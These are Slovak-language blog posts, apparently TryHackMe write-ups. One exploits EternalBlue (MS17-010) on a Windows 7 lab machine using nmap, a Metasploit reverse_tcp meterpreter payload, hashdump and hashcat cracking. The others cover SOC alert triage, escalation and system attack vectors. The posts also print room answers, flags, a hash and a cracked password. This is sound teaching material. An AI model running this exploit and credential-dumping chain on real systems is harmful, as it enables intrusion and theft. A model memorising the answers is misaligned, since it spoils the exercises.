DEV Community: mikensen

THM - Blue

mikensen — Fri, 13 Mar 2026 08:12:41 +0000

Blue je jedna z "legendárnych" miestností na TryHackMe zameraná na exploit známej zraniteľnosti MS17-010 (EternalBlue) vo Windows SMB službe. Krásny príklad ako vobec pochopiť úplný zaklad "penetrácie" do systému. Usaď sa, alebo ešte lepšie - vyskúšaj si.

Čo ti to dá podľa tryhackme.com :

SMB enumerácie
práca s Metasploit
exploitovania známej Windows zraniteľnosti.

Poďme na to !

Ako väčšina zadaní na obdobných CTF strojoch, aj tu je cieľ - získať FLAG. Táto machine nám krásne ukáže ako sa dá - resp. ako sa dala rozbiť Windows 7 cez nedeľný obed.

TryHackMe

Názov: Blue
Obtiažnosť: Easy
OS cieľa: Windows 7
Téma: EternalBlue (MS17-010)
Čas: ~15–60 minút (resp hodiny ak zabudneš spustiť VPN ako ja, keď som s týmto všetkým začínal)

Čo si vyskúšaš

Ako skenovať cieľ Nmapom
Čo je EternalBlue a prečo Microsoft mal veľmi zlý rok 2017
Ako použiť Metasploit — nástroj ktorý vyzerá hrozivo ale je to v podstate IKEA návod
Čo je Meterpreter shell
Ako cracknúť heslo a cítiť sa pritom ako z Mr. Robot

Disclaimer
Všetky útoky robíme výhradne na TryHackMe stroji. Ak to skúsiš na niečom inom bez povolenia, možeš mať väčší problém ako ten Windows 7 bez patchov.

🗺️ Typický Plán - Workflow
Recon → Scanning / Enumeration → Exploitation → Privilege Escalation → Post-Exploitation → Loot / Flags - Pivko

FÁZA 1 — Recon - Scanning (a.k.a. "Kukám čo tam máte")

nmap -sV -sC -O --script vuln <IP_ADRESA>

Čo sme práve napísali:

Flag	Čo robí	Laicky povedané
`-sV`	Zisti verzie služieb	"Čo tam beží a aká stará verzia?"
`-sC`	Spusti default skripty	"Skontroluj bežné veci za mňa"
`-O`	Detekuj OS	"Aký systém tam je?"
`--script vuln`	Skontroluj zraniteľnosti	"Nájdi mi niečo na exploitovanie, prosím"

⏳ Nmap teraz pracuje. Toto je ideálny čas na kafe. resp. na zodpovedanie otázky "a čo vlastne robíš na tom počítači?" od rodinných príslušníkov.****

Ale reálne čo sa nás TryHackMe pýta ako prvé :

How many ports are open with a port number under 1000?
3

okej už teraz sa chytám za hlavu, lebo som do toho nmap príkazu nezadal, že stačia porty pod 1000.. čiže ich takto oscannuje (zbytočne)všetkých 65535.
Lepší príkaz by bol :
nmap -sV -sC -O --script vuln -p 1-999 <IP_ADRESA>

Čo tam hned vidíme ?

Port 445 = SMB protokol = Windows zdieľanie súborov = náš vstup do dejín.
smb-vuln-ms17-010 Nmap nám práve povedal "hej, tento stroj má otvorené dvere, kľúč leží na rohožke"

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
ms17-010

🤦 Windows 7 bez patchov. V roku 2017 tento exploit zasiahol nemocnice, banky a firmy po celom svete. Patch existoval. Ľudia ho nenainštalovali. WannaCry ransomware im potom zašifroval všetko. IT oddelenia mali veľmi zaujímavý pondelok.

FÁZA 2 — Exploitation (Metasploit time)

Spusti Metasploit :
msfconsole

Vždy keď sa zobrazí tento ASCII art, tak sa cítim ako hacker z filmu...

Ale Metasploit je v podstate google pre exploity. Akurát namiesto výsledkov dostaneš prístup do systémov..

Nájdi exploit:
search ms17-010
Uvidíš zoznam. Hľadáš:
exploit/windows/smb/ms17_010_eternalblue

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
exploit/windows/smb/ms17_010_eternalblue

💡 Prečo sa volá EternalBlue? Vytvorila ho NSA — americká tajná služba. Niekto im ho ukradol a zverejnil. Microsoft vydal patch. Ľudia ho neignorovali... oh shit.. vlastne som to prezradil pred chvíľou - ignorovali. A tak vznikol WannaCry. Celý príbeh je lepší ako Netflix seriál.

Načítaj exploit:
use exploit/windows/smb/ms17_010_eternalblue
Prompt sa zmení. Teraz si v module. Ako keď vstúpiš do obchodu — ešte si nič nekúpil ale už vieš čo chceš.

Pozri čo treba v tom exploite/module nastaviť :
show options
Metasploit ti ukáže tabuľku. Povinné veci sú označené yes

Nastav cieľ :
set RHOSTS <IP_ADRESA>
RHOSTS = Remote Hosts = "koho idem navštíviť bez pozvánky"

Show options and set the one required value. What is the name of this value? (All caps for submission)
RHOSTS

Nastav payload :
set payload windows/x64/meterpreter/reverse_tcp

💡 Payload = čo sa spustí na cieli po exploite. reverse_tcp znamená, že cieľ sa pripojí späť k nám. Nie my k nemu. Preto to funguje aj za firewallom — firewall blokuje prichádzajúce spojenia, ale odchádzajúce nechá. "vyšiel som von cez okno ale dvere sú stále zamknuté."

Spusti exploit :
run resp. exploit

Ak to hneď nefungovalo — normálne. Skús znova. Exploity sú už raz také..

FÁZA 3 — Post-Exploitation (Turistika po cudzom systéme)

Máš shell. Čo teraz? Pozri sa kto si.
Over svoje privilégiá

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

NT AUTHORITY\SYSTEM je najvyšší level na Windows. Vyšší ako Administrator. Vyšší ako IT admin. Vyšší ako CEO. Prakticky — môžeš robiť čokoľvek. EternalBlue ti nedal kľúče od bytu, dal ti kľúče od celej budovy.

Stabilizuj shell — migruj do iného procesu

Tvoj shell môže byť nestabilný. Ukradni si miesto v inom procese:

ps

Uvidíš zoznam všetkých bežiacich procesov. Hľadáš niečo pokojné a stabilné — spoolsv.exe alebo svchost.exe. Vezmi jeho PID.

migrate <PID>

FÁZA 4 — Hashe a Cracking (Mr. Robot moment)

Vytiahneme hashe :
hashdump

Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Jon

💡 Windows neukladá heslá ako plaintext — ukladá ich ako NTLM hashe. Hash je jednosmerná funkcia — heslo123 → ffb43f0de35be4d9917ac0cc8ad57f8d. Nedá sa priamo vrátiť späť. Ale dá sa uhádnuť — skúšaš milióny hesiel, hashneš ich a porovnávaš. Volá sa to slovníkový útok a je to presne také nudné ako znie.

Uložíme ten Jonov hash do súboru hashujeme.txt:

echo "ffb43f0de35be4d9917ac0cc8ad57f8d" > hashujeme.txt

💡 Celý reťazec má formát meno:RID:LM_hash:NTLM_hash::: — LM hash (aad3b435...) je prázdny placeholder ktorý Windows používa keď LM hashing vypnutý. NTLM hash je ten druhý a ten nás zaujíma.

a potom crackneme s hashcatom :

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt

Heslo je alqfna22. Jon si myslel že je to bezpečné. Jon sa mýlil.

Copy this password hash to a file and research how to crack it. What is the cracked password?
alqfna22

🚩 Flagy

Pohľadáme všetky súbory kde je slovo flag :

search -f flag*.txt

A už to len postupne prečítame..

cat C:\\flag1.txt
`flag{access_the_machine}`

cat C:\\Windows\\System32\\config\\flag2.txt
`flag{sam_database_elevated_access}`

cat C:\\Users\\Jon\\Documents\\flag3.txt
`flag{admin_documents_can_be_valuable}`

📊 Čo sme dnes urobili?



Nmap scan     →  Objavili sme otvorené dvere (port 445 + MS17-010)
EternalBlue   →  Prešli sme cez ne (SYSTEM shell)
Migrácia      →  Zaistili sme si pohodlný pobyt
Hashdump      →  Ukradli sme kľúče od trezoru
Hashcat       →  Otvorili sme trezor
Flagy         →  Zobrali sme čo tam bolo a odišli

A teraz pifko.

THM - SOC L1 Alert Reporting

mikensen — Wed, 11 Mar 2026 07:19:43 +0000

L1 analytici pri triage alertov niekedy nevedia presne klasifikovať alert, preto potrebujú pomoc seniora alebo vlastníka systému. Môžu tiež naraziť na reálne kyberútoky, ktoré vyžadujú rýchlu reakciu. Táto časť vysvetľuje reportovanie alertov, eskaláciu a komunikáciu.

Ciele:

pochopiť reportovanie a eskaláciu v SOC
naučiť sa písať komentáre a reporty k alertom
spoznať správne komunikačné postupy
precvičiť triage v simulovanom prostredí

Alert Funnel

L1 analytici dostávajú alerty v SIEM, EDR alebo ticket systéme.
Väčšina alertov je False Positive alebo sa vyrieši na L1.
True Positive a zložitejšie prípady sa eskalujú na L2.
Len malé množstvo skončí ako reálny incident (DFIR).

Dôležité pojmy

Reporting – zdokumentovanie analýzy alertu a dôkazov (hlavne pri True Positive).
Escalation – poslanie alertu na L2 analytika, ak treba ďalšie vyšetrovanie alebo zásah.
Communication – komunikácia s inými tímami (napr. IT alebo HR) pre doplnenie informácií.

✅ Cieľ: aby L2 mal jasný report a kontext a nemusel začínať analýzu od nuly.

What is the process of passing suspicious alerts to an L2 analyst for review?
Alert Escalation

What is the process of formally describing alert details and findings?
Alert Reporting

Prečo písať report

Report od L1 analytika je dôležitý, pretože:

dáva kontext pre eskaláciu – L2 rýchlo pochopí situáciu

uchováva zistenia – alerty sa ukladajú dlhodobo, logy len 3–12 mesiacov

zlepšuje analytické schopnosti – vysvetlenie = lepšie pochopenie

Formát reportu (5W)

Pri reporte použi Five 'W':
Who – ktorý používateľ vykonal akciu
What – aká aktivita sa stala
When – kedy sa aktivita začala a skončila
Where – zariadenie, IP alebo web
Why – dôvod tvojho záveru (True / False Positive)

✅ Cieľ: aby L2 alebo DFIR tím rýchlo pochopil alert bez novej analýzy.

According to the SOC dashboard, which user email leaked the sensitive document?
m.boslan@tryhackme.thm
Looking at the new alerts, who is the "sender" of the suspicious, likely phishing email?
support@microsoft.com
Open the phishing alert, read its details, and try to understand the activity.
Using the Five Ws template, what flag did you receive after writing a good report?
Note: Do not change the status yet, fill in the Analyst Comment and click Save.
HM{nice_attempt_faking_microsoft_support}

Escalation Guide (SOC)

Po vyhodnotení alertu a napísaní reportu musí L1 analytik rozhodnúť, či je potrebná eskalácia na L2.

Kedy eskalovať alert

Alert sa eskaluje, ak:

naznačuje vážny kybernetický útok, ktorý vyžaduje hlbšiu analýzu alebo DFIR
sú potrebné remediačné kroky (odstránenie malvéru, izolácia hosta, reset hesla)
je nutná komunikácia s klientom, manažmentom, partnermi alebo autoritami
analytik nerozumie alertu a potrebuje pomoc seniornejšieho kolegu

Postup eskalácie

Väčšinou stačí:

Priradiť ticket L2 analytikovi na smene
Upozorniť ho v internom chate

Niektoré tímy však vyžadujú formálny eskalačný formulár s viacerými povinnými údajmi.

Čo robí L2

Po prijatí ticketu L2:
prečíta report od L1
overí, či ide o True Positive
pokračuje v detailnejšej analýze
komunikuje s ďalšími tímami
pri vážnych prípadoch spustí Incident Response proces
Požiadanie o pomoc

Ak si L1 nie je istý, je úplne v poriadku požiadať L2 o podporu. Najmä na začiatku je lepšie alert konzultovať než ho nesprávne uzavrieť.

Typický workflow v SOC nástroji

Presunúť alert do stavu In Progress
Vykonať analýzu
Napísať alert report a určiť verdikt
Ak treba, priradiť ticket L2
L2 dostane notifikáciu a pokračuje v investigácii.

Who is your current L2 in the SOC dashboard that you can assign (escalate) the alerts to?
E.Fleming
What flag did you receive after correctly escalating the alert from the previous task to L2?
Note: If you correctly escalated the alert earlier, just edit the alert and click "Save" again.
THM{good_job_escalating_your_first_alert}
Now, investigate the second new alert in the queue and provide a detailed alert comment.
Then, decide if you need to escalate this alert and move on according to the process.
After you finish your triage, you should receive a flag, which is your answer!

Krízová komunikácia v SOC

Eskalácia a reportovanie vyzerajú jednoducho, no v praxi sa často objavia nečakané situácie. Preto by mal mať SOC tím pripravené Crisis Communication postupy, ktoré určujú, ako reagovať v kritických prípadoch.

Typické komunikačné situácie

Kritický alert a nedostupné L2
Ak potrebujete eskalovať urgentný alert a L2 nereaguje viac ako 30 minút:
skontrolujte núdzové kontakty
skúste zavolať L2, potom L3
ak stále nikto nereaguje, kontaktujte manažéra
Kompromitovaný Slack / Teams účet
Ak potrebujete overiť login používateľa:
nekontaktujte ho cez kompromitovaný chat
použite alternatívny spôsob komunikácie (napr. telefón)
Veľké množstvo alertov naraz
Pri náhlej vlne alertov:
prioritizujte podľa závažnosti
informujte L2 na smene, že dochádza k preťaženiu
Neskoré zistenie chyby v klasifikácii
Ak zistíte, že alert bol pravdepodobne zle vyhodnotený:
okamžite kontaktujte L2
vysvetlite situáciu a obavy
útočníci môžu byť dlho neaktívni pred reálnym dopadom
Problém so SIEM logmi
Ak nie je možné dokončiť triage kvôli chýbajúcim alebo zle parsovaným logom:

alert neignorujte
analyzujte dostupné dáta
problém nahláste L2 alebo SOC inžinierovi

👉 Základné pravidlo: pri nejasnostiach alebo kritických situáciách vždy komunikovať a eskalovať skôr než neskôr.

Should you first try to contact your manager in case of a critical threat (Yea/Nay)?
nay
Should you immediately contact your L2 if you think you missed the attack (Yea/Nay)?
yea

THM - SOC L1 Alert Triage

mikensen — Sat, 07 Mar 2026 06:56:23 +0000

O čo ide?

Alert je základný koncept každého SOC tímu — správne zvládnutie alertov rozhoduje medzi odhaleným a zmeškaným útokom.

Od Eventov k Alertom

Predstav si situáciu:
Si SOC intern, pozeráš sa na monitor mentora a vidíš stovky alertov — "Email Marked as Phishing", "Unusual Gmail Login Location" a hrozivý "Unapproved Mimikatz Usage" v červenom stĺpci.

Ako vznikne alert:

Nastane event (login, spustenie procesu, stiahnutie súboru)
Systém to zaloguje (OS, firewall, cloud)
Logy sa posielajú do SIEM / EDR
Bezpečnostné riešenie vygeneruje alert — upozornenie na podozrivú aktivitu

💡 Bez alertov by analytici museli ručne prechádzať milióny logov denne. Vďaka alertom riešia len desiatky upozornení.

Platformy na správu alertov:
TypPríkladySIEMSplunk ES, ElasticEDR/NDRMS Defender, CrowdStrikeSOARSplunk SOAR, CortexITSMJira, TheHive

Roly v SOC tíme:

L1 analytik — triaguje alerty, oddeľuje hrozby od falošných poplachov
L2 analytik — hlbšia analýza eskalovaných alertov
SOC engineer — zabezpečuje kvalitu alertov
SOC manager — sleduje rýchlosť a kvalitu triáže

What is the number of alerts you see in the SOC dashboard?
5
What is the name of the most recent alert you see?
Double-Extension File Creation

Vlastnosti alertov (Alert Properties)

Alert obsahuje niekoľko kľúčových vlastností:

Čas alertu – kedy bol alert vytvorený (zvyčajne pár minút po skutočnej udalosti)
Názov alertu – stručný popis toho, čo sa stalo (napr. Unusual Login Location, RDP Bruteforce)
Závažnosť – urgentnosť alertu: Nízka / Stredná / Vysoká / Kritická
Stav – či niekto na alerte pracuje: Nový / V riešení / Uzavretý
Verdikt – či ide o skutočnú hrozbu (True Positive) alebo planý poplach (False Positive)
Pridelený analytik – kto je zodpovedný za preskúmanie alertu
Popis – vysvetľuje logiku pravidla, prečo aktivita môže naznačovať útok a ako triážovať
Polia alertu – konkrétne hodnoty, na ktorých alert vypol (napr. názov počítača, zadaný príkaz)

What was the verdict for the "Unusual VPN Login Location" alert?
False Positive

What user was mentioned in the "Unusual VPN Login Location" alert?
M.Clark

Prioritizácia alertov v SOC

Keď analytik čelí stovkám alertov, musí rýchlo rozhodnúť, ktorý riešiť ako prvý. Postup je jednoduchý:

Filtrovanie – Vylúč alerty, ktoré už niekto rieši alebo boli preskúmané. Pracuj len s novými, nevyriešenými alertmi.
Triedenie podľa závažnosti – Najprv critical, potom high, medium a nakoniec low. Platí, že čím vyššia závažnosť, tým väčšia pravdepodobnosť reálnej hrozby s vážnym dopadom.
Triedenie podľa času – Pri alertoch rovnakej závažnosti začni od najstarších. Útočník zo staršieho incidentu je pravdepodobne ďalej v útoku a spôsobuje väčšie škody ako ten, kto práve začal.

Should you first prioritise medium over low severity alerts? (Yea/Nay)
Yea

Should you first take the newest alerts and then the older ones? (Yea/Nay)
Nay

Assign yourself to the first-priority alert and change its status to In Progress.
The name of your selected alert will be the answer to the question.
Potential Data Exfiltration

Alert Triage – postup

Úvodné kroky – Priraď si alert na seba a zmeň jeho stav na In Progress. Oboznám sa s názvom, popisom a kľúčovými indikátormi alertu.
Investigácia – Najnáročnejšia časť. Niektoré tímy majú pripravené workbooky (playbooks/runbooks) s návodom pre konkrétne typy alertov. Bez nich platia tieto odporúčania:

Zisti, kto je ohrozený – používateľ, hostname, sieť, cloud alebo webstránka
Identifikuj podozrivú akciu – prihlásenie, malvér, phishing a pod.
Preskúmaj okolité udalosti – čo sa dialo tesne pred a po alerte
Over závery pomocou threat intelligence platforiem

Záverečné kroky – Rozhodni, či je alert skutočná hrozba (True Positive) alebo planý poplach (False Positive). Napíš podrobný komentár s postupom a zdôvodnením verdiktu, a alert presuň do stavu Closed.

Which flag did you receive after you correctly triaged the first-priority alert?
THM{looks_like_lots_of_zoom_meetings}

Which flag did you receive after you correctly triaged the second-priority alert?
THM{how_could_this_user_fall_for_it?}

Which flag did you receive after you correctly triaged the third-priority alert?
THM{should_we_allow_github_for_devs?}

THM - Systems as Attack Vectors

mikensen — Wed, 04 Mar 2026 12:46:47 +0000

„Systémy ako vektory útoku“

Naučte sa, ako útočníci zneužívajú zraniteľné a nesprávne nakonfigurované systémy a ako ich môžete chrániť.

Pokračujeme v téme SOC a ochrany digitálneho sveta, tentoraz sa zameriame na systémy ako cieľ útokov. Tu sa dozvieš, čo systémy sú, prečo a ako ich útočníci cielia, a čo môžeš ako SOC analytik spraviť, aby bola firma v bezpečí.

Ciele lekcie:

Pochopiť úlohu systémov v digitálnom svete
Pozrieť si reálne útoky na systémy
Vyskúšať si získané vedomosti v dvoch praktických scenároch

Útočníci môžu napadnúť slabé systémy priamo, bez toho, aby si používatelia všimli. Čím cennejší systém (server, cloud, PC), tým väčšia škoda – napr. mail server môže ohroziť tisícky účtov, študentský laptop len jeden účet.

Môžu sa kybernetické útoky stať bez akéhokoľvek zásahu obete? (Áno / Nie)
Yea

Môže porušenie (breach) len jediného systému viesť ku katastrofálnym následkom? (Áno / Nie)
Yea

Väčšina útokov začína získaním prístupu do cieľového systému, potom útočník kradne dáta, nasadí ransomware alebo ničí informácie.

Ako systémy napádajú ľudia a softvér:

Ľudia: USB z ulice, stiahnutý malware, opakované slabé heslá (81 % únikov zahŕňa ukradnuté heslá).
Zraniteľnosti: Každý softvér môže mať chyby; tisíce nových zraniteľností sú každý rok aktívne zneužívané.
Dodávateľský reťazec: Napadnutie knižnice alebo aplikácie môže ohroziť všetkých používateľov – známe prípady SolarWinds či 3CX.

Ako sa volá bezpečnostná chyba, ktorú je možné zneužiť na prelomenie systému?
Vulnerability

Ako sa volá útok, keď malware pochádza z dôveryhodnej aplikácie alebo knižnice?
Supply Chain

Každý softvér má chyby, niektoré sa odhalia až po rokoch. Ak útočník nájde chybu skôr než ostatní, ide o zero-day.
Keď sa zraniteľnosť sprístupní, dostane CVE číslo a začína závod: útočníci vyvíjajú exploity, obrancovia aktualizujú systémy.

Ako reagovať:

Použiť záplatu od dodávateľa
Obmedziť prístup len na dôveryhodné IP
Použiť dočasné opatrenia od výrobcu
Blokovať známe útoky cez IPS/WAF

Aké je CVE pre kritickú zraniteľnosť SharePointu nazývanú 'ToolShell'?
CVE-2025-53770

Ako by si reagoval na zistenú zraniteľnosť vo svojom systéme?
Patch

Misconfigurations sú chyby v nastavení systému, nie v softvéri – často kvôli jednoduchosti alebo pohodliu (napr. heslo “1111”).

Príklady:
Heslo “123456” odhalilo 64 miliónov žiadostí o prácu McDonald’s
Zle nastavený AWS cloud ohrozil 106 miliónov bankových účtov
Nesprávne nakonfigurované smart chladničky použité v botnetoch

Ako reagovať:

Oprav nastavenia, žiadny patch nie je potrebný
Penetračné testy a etickí hackeri
Pravidelné skeny zraniteľností
Ručné audity konfigurácie podľa bezpečnostných štandardov

Môže patch systému alebo aktualizácia softvéru opraviť nesprávne nastavenia (misconfigurations)?
Nay

Ktorá aktivita zahŕňa autorizovaný kybernetický útok na odhalenie nesprávnych nastavení (misconfigurations)
Penetration testing

Útočníci hľadajú vždy najľahšiu cestu – cez chybu systému alebo človeka. Preto treba chrániť ľudí aj systémy kombináciou mitigácie a detekcie.

Najbežnejšie opatrenia na ochranu systémov:

Patch management: pravidelne záplatuj zraniteľné systémy
Školenie IT: menej chýb pri nastavovaní systémov
Ochrana siete: prístup len pre dôveryhodné IP/ľudí
Antivírus: detekuje alebo zastaví útoky

What flag did you receive after completing the "Systems at Risk" challenge?

THM{patch_or_reconfigure?}

What flag did you receive after completing the "Remediation Plan" challenge?

THM{best_systems_defender!}